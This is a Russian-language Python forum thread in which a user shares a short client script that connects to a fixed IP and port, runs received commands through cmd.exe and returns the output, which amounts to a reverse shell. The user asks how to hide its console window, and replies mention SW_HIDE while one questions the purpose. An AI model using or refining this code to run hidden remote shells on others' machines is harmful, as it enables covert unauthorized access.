Форум сайта python.su
Ребят, помогите пожалуйста, знаю проблема глупая, но уже 3-й день мучаюсь. Есть две программы: Сервер и Клиент. На своей машине запускаю сервер, а на удаленной клиент. Задача была получить удаленно командную строку (cmd). Все работает отлично, но при запуске клиента открывается пустая командная строка, хотелось бы ее скрыть. Вот код клиента
#!/usr/bin/python3.5 from socket import * import subprocess, time while True: sock = socket(AF_INET, SOCK_STREAM) sock.connect(('192.168.0.228', 6996)) try: data = sock.recv(1024) if not data: break result = subprocess.run(['cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, input=data) except: break sock.send(result.stdout) sock.send(result.stderr) sock.close()
Отредактировано web-bomber (Июнь 5, 2018 06:18:02)
Прикреплённый файлы:
Безымянный.png (65,3 KБ)
Офлайн
web-bomberЭто не она открывается а вы ее открываете. запускайте питон без запуска cmd. Код на питоне на это никак не влияет.
но при запуске клиента открывается пустая командная строка
Офлайн
doza_andИзвиняюсь, я кривой код вставил. cmd все равно будет открываться у клиента, даже если py в exe скомпилировать. Думал смотреть в сторону SW_HIDE но не знаю что с этим делать. Помогите, пожалуйста)
Офлайн
web-bomberничего не делать, это ключ в winAPI. чтобы его использовать вам нужно получить хендл на окно и с помощью например функции ShowWindow установить окну признак срытый(SW_HIDE или 0) тогда окошко исчезнет, но вам оно всеравно не нужно.
Думал смотреть в сторону SW_HIDE но не знаю что с этим делать.
web-bomberа нахрена вам cmd? вы через него запускаете скрипт клиента? почему сразу не запускать пайтон без консоли?
cmd все равно будет открываться у клиента, даже если py в exe скомпилировать.
[code python][/code]
Отредактировано PEHDOM (Июнь 5, 2018 08:19:02)
Офлайн
Мне надо уделенно настраивать пк через cmd. Можете примерно показать как это будет выглядеть, пожалуйста . Скомпилировал client.py в exe. Запуская, все коннектится, но появляется пустая консоль, хотел бы ее и скрыть.
PEHDOM
Офлайн
Офлайн
Когда то давно делал так
Офлайн
web-bomber я не пойму то вам консоль нужна так как вы через нее чтото там настраиваете то не нужна потому что гладиолус. Давайте вы поподробнее опишете что вы делаете. Вы собираете exe из .py потом отттуда запускаете cmd консоль, а из нее еще чтото? зачем вам консоль и зачем вам ее скрывать?
[code python][/code]
Офлайн